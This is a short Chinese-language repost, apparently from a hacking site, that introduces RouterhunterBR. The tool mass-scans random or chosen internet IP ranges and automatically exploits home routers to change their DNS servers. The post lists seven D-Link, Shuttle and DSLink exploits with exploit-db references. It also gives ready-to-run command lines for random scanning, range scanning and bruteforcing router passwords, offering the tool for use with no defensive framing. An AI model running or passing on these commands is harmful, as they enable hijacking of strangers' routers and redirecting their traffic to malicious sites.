路由器漏洞自动化扫描工具

　　项目地址

　　https://github.com/jh00nbr/Routerhunter-2.0

　　项目简介

　　RouterhunterBR是一个自动化的漏洞发现工具，并支持对互联网上的路由器和易受攻击的设备进行测试。RouterhunterBR可以对自定义的IP或随机的IP进行扫描，以自动利用在家用路由器漏洞DNSChanger。

　　DNSChanger是一个木马能够直接用户请求非法网站。在实践中，这是恶意软件必须改变我们的机器的用户重定向到站点恶意目的的DNS设置的能力。想象一下，例如，您的系统是否感染了这种恶意软件，可能会发生什么是用户访问特定网站(如：Facebook.com)可能会被转发到一个不请自来的网站，并可能违法。

　　支持的漏洞列表

　　Shuttle Tech ADSL Modem-Router 915 WM / Unauthenticated Remote DNS Change Exploit

　　reference: http://www.exploit-db.com/exploits/35995/

　　D-Link DSL-2740R / Unauthenticated Remote DNS Change Exploit

　　reference: http://www.exploit-db.com/exploits/35917/

　　D-Link DSL-2640B Unauthenticated Remote DNS Change Exploit

　　reference: http://1337day.com/exploit/23302/

　　D-Link DSL-2780B DLink_1.01.14 – Unauthenticated Remote DNS Change

　　reference: https://www.exploit-db.com/exploits/37237/

　　D-Link DSL-2730B AU_2.01 – Authentication Bypass DNS Change

　　reference: https://www.exploit-db.com/exploits/37240/

　　D-Link DSL-526B ADSL2+ AU_2.01 – Unauthenticated Remote DNS Change

　　reference: https://www.exploit-db.com/exploits/37241/

　　DSLink 260E – Authenticated routers – DNS Changer – Bruteforce reference: https://www.youtube.com/watch?v=tNjy91g2Rak

　　http://blog.inurl.com.br/2015/03/dslink-260e-defaut-passwords-dns-change_17.html

　　使用方法

　　随机IP扫描

　　python routerhunter.py –dns1 8.8.8.8 –dns2 8.8.4.8 –randomip –limitip 10 –threads 10

　　python routerhunter.py –dns1 8.8.8.8 –dns2 8.8.4.8 -rip -lmtip 10 –threads 10

　　IP段扫描

　　python routerhunter.py –dns1 8.8.8.8 –dns2 8.8.4.8 –range 192.168.25.0-255 –threads 10

　　特殊IP段扫描

　　python routerhunter.py –dns1 8.8.8.8 –dns2 8.8.4.8 –startip 192.168.*.* –endip 192.168.*.* –threads 10

　　暴力破解帐号密码

　　python routerhunter.py –dns1 8.8.8.8 –dns2 8.8.4.4 –range 177.106.19.65-70 –bruteforce –threads 10

　　

原文地址:https://hack.77169.com/201603/224505.shtm